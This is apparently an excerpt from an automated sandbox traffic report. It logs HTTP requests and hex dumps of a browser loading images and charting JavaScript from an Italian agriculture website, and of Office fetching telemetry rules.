                                                                                                                                          2024-11-28 10:32:57 UTC7912INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 f5 08 06 00 00 00 26 ab 67 a1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 32 c0 49 44 41 54 78 01 9d 5d 0b e0 97 e3 d9 be ff e5 90 48 a4 1c a2 90 90 0e 42 39 94 d3 54 d2 34 61 8e 73 cc 61 0e 33 87 39 7c 36 f6 91 8d 19 c3 c6 9c 66 36 b6 6f 73 1c 63 6c a6 28 67 46 39 56 48 52 29 87 48 28 24 f4 ff ae eb 7e ee eb 79 9f df db 3f c3 c3 ef bd ef e7 3e 5c f7 f5 3c ef f1 f7 be ef ef 5f 93 9d 30 ac d9 bc 51 34 25 55 4b 76 65 96 a4 af d4 3d 07 86 96 6c f2 95 d2 31 23 b8 2c d7 dc bc c0 5a 35 cd 04 ce 68 6b 5a e6 5a fb f5 5d 93 44 83 b2 c9 89 36 23 d1 93 94 49 20 36 47 4d 52 6a 23 23 8f f2 85 52 d9 69 21 bd c2 62 40 06 2b 74 d8 2a 8c c5 00 b9 ca 56 69 77 b2 8d ba 75 11 33 5a 99 93 44 04 c1
                                                                                                                                          Data Ascii: PNGIHDR*&ggAMAa2IDATx]HB9T4asa39|6f6oscl(gF9VHR)H($~y?>\<_0Q4%UKve=l1#,Z5hkZZ]D6#I 6GMRj##Ri!b@+t*Viwu3ZD
                                                                                                                                          2024-11-28 10:32:57 UTC5153INData Raw: ee 33 40 19 3a 13 73 01 fc a5 4c fc 11 15 de 1a e7 97 39 6e ab bc 52 e2 cb 04 6c 7c c3 6c e2 f4 a9 b6 43 9f 7e 4c 8a bc c0 67 48 0b 84 dc c6 7c d5 08 19 44 99 c5 0f 85 23 40 29 47 a9 2e 8b 30 08 cd c1 cc de c2 6d 71 3f 3c c1 ce 83 3e 7f 16 7c d8 d0 3d ac 23 1e de f6 c3 2b 6f 5b 62 1b 4e ad c0 73 03 12 4a 32 a5 ce da 5a ab 91 1d cf eb 45 00 c9 1e 10 6c 32 69 f4 f5 bc 5e 45 62 20 0f 4f 9c 60 eb ae d1 d9 ba 76 5a 03 6f 34 36 db ff dd 7f 97 0d d9 62 1b 7b e7 96 07 6d fc e5 37 d9 f2 cb 2d 67 b7 3f 72 7f 1e 98 8f 34 e0 83 03 44 0c a2 ac e7 31 58 04 9f 26 db 19 db e8 d2 1a f3 e9 75 1c 0e 26 12 65 44 bf cb ea 6b da da 78 a7 f9 85 d7 5e c1 df 2b f9 d8 5f cb 38 77 e4 f1 36 74 8b 81 fe 3a dc 3f 71 b1 72 fe cd 7f f0 bf 42 ac b4 25 a4 ea e7 5a 32 54 b2 09 7f 12 23 ed
                                                                                                                                          Data Ascii: 3@:sL9nRl|lC~LgH|D#@)G.0mq?<>|=#+o[bNsJ2ZEl2i^Eb O`vZo46b{m7-g?r4D1X&u&eDkx^+_8w6t:?qrB%Z2T#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.4498075.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:56 UTC399OUTGET /wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:57 UTC280INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:56 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 8887
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:56 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:32:57 UTC7912INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 04 05 05 08 07 08 0f 0a 0a 0f 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 6f 01 2c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 08 01 09 ff c4 00 43 10 00 01 03 03 02 04 02 05 0a 04 04 05 05 00 00 00 02 01 03 04 00 05 11 06 12 07 13 21 31 14 22 08 32 41 42 51 15 16 23 33 52 53
                                                                                                                                          Data Ascii: JFIFCCo,C!1"2ABQ#3RS
                                                                                                                                          2024-11-28 10:32:57 UTC975INData Raw: 8a f5 f5 ff 00 2f 65 ac 2f 48 bd 66 b3 d9 2d cd 16 b3 36 8f 3d 73 e1 9e 5b d2 77 af f6 db db 5b 47 9b 68 f6 3c f1 23 d1 7f 54 b4 d2 f8 7d 51 62 7e 42 16 10 0d f7 1a 45 0f 8a f9 17 af e1 5e 4c f0 fb 6d d2 d1 f5 3f 60 a7 ce 46 19 bf 9f a7 b4 57 6f 56 f5 9b 73 fd 16 88 f3 3d 9d 79 89 1e 8c 7a 8c 1a 45 63 52 d9 b9 e9 84 30 75 e7 14 7f 1c 2b 6d 92 ff 00 9d 4d b8 7c ed d2 df b1 4e 0f 9c 8a 4d a7 ca e9 e6 2b ea f9 3b f9 df a7 cf 1c bf aa ef dc 31 d3 f6 8e 19 e9 96 ac 36 84 62 4d c5 e2 e7 5d 2e 28 92 5d 39 32 55 30 a5 86 e3 fa a3 ea 80 e7 ca 3f 8e 6b d2 c5 8a 31 d7 96 1f 98 f1 7e 2d 9b 89 ea 6d 9f 2f 6c f4 ad 63 d1 c7 4f 56 95 fb 67 d6 b6 f6 6d e7 71 bf 4b 21 69 a4 92 df 5f 31 46 83 ca ca 7e 0e 4d 34 44 fd 79 75 6b c7 7d 85 60 b9 1a 99 38 e1 c2 e7 8a 0c b9 24 f2
                                                                                                                                          Data Ascii: /e/Hf-6=s[w[Gh<#T}Qb~BE^Lm?`FWoVs=yzEcR0u+mM|NM+;16bM].(]92U0?k1~-m/lcOVgmqK!i_1F~M4Dyuk}`8$


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          50192.168.2.44980813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:57 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:32:57 UTC471INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:57 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 218853
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Cache-Control: public
                                                                                                                                          Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                          ETag: "0x8DD0EF5BC53602D"
                                                                                                                                          x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103257Z-174f7845968j6t2phC1EWRcfe80000000yb000000000aenw
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:32:57 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                          2024-11-28 10:32:57 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                          2024-11-28 10:32:57 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                          2024-11-28 10:32:58 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.4498105.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:57 UTC403OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/core.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:58 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:58 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 751172
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:58 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:58 UTC7875INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3b 77 69 6e 64 6f 77 2e 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6f 2c 73 29 7b 66 6f 72 28 76 61 72 20 61 2c 75 2c 6c 2c 68 3d 30 2c 63 3d 5b 5d 3b 68 3c 69 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 75 3d 69 5b 68 5d 2c 6e 5b 75 5d 26 26 63 2e 70 75 73 68 28 6e 5b 75 5d 5b 30 5d 29 2c 6e 5b 75 5d 3d 30 3b 66 6f 72 28 61 20 69 6e 20 6f 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 61 29 26 26 28 74 5b 61 5d 3d 6f 5b 61 5d 29 3b 66 6f 72 28 65 26 26 65 28 69 2c 6f 2c 73 29 3b
                                                                                                                                          Data Ascii: !function(t){var e=window.am4internal_webpackJsonp;window.am4internal_webpackJsonp=function(i,o,s){for(var a,u,l,h=0,c=[];h<i.length;h++)u=i[h],n[u]&&c.push(n[u][0]),n[u]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(t[a]=o[a]);for(e&&e(i,o,s);
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 3d 3d 3d 74 3f 30 3a 74 29 7d 3a 22 61 64 64 22 3d 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 30 3d 3d 3d 74 3f 30 3a 74 29 2c 74 68 69 73 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 30 3d 3d 3d 74 3f 30 3a 74 2c 69 29 2c 74 68 69 73 7d 29 7d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 76 26 26 28 6d 7c 7c 78 2e 66 6f 72 45 61 63 68 26 26 21 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e 65 77 20 76 29 2e 65 6e 74 72 69 65 73 28 29 2e 6e 65 78 74 28 29 7d 29 29 29 7b 76 61 72 20 4f 3d 6e 65 77 20 76 2c 53 3d 4f 5b 5f 5d 28 6d 3f 7b 7d 3a 2d 30 2c 31 29 21 3d 4f 2c 54 3d 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 2e
                                                                                                                                          Data Ascii: ===t?0:t)}:"add"==t?function(t){return e.call(this,0===t?0:t),this}:function(t,i){return e.call(this,0===t?0:t,i),this})};if("function"==typeof v&&(m||x.forEach&&!c(function(){(new v).entries().next()}))){var O=new v,S=O[_](m?{}:-0,1)!=O,T=c(function(){O.
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 68 69 73 29 2c 69 3d 22 66 6c 61 67 73 22 69 6e 20 75 3f 53 74 72 69 6e 67 28 74 2e 66 6c 61 67 73 29 3a 61 2e 63 61 6c 6c 28 74 29 2c 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 74 2e 73 6f 75 72 63 65 2c 7e 69 2e 69 6e 64 65 78 4f 66 28 22 67 22 29 3f 69 3a 22 67 22 2b 69 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 6f 28 74 2e 6c 61 73 74 49 6e 64 65 78 29 2c 6e 65 77 20 6c 28 6e 2c 65 29 7d 7d 29 7d 2c 22 31 71 61 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 56 73 37 52 22 29 2c 6f 3d 69 28 22 4d 74 70 6b 22 29 2c 73 3d 66 75 6e 63
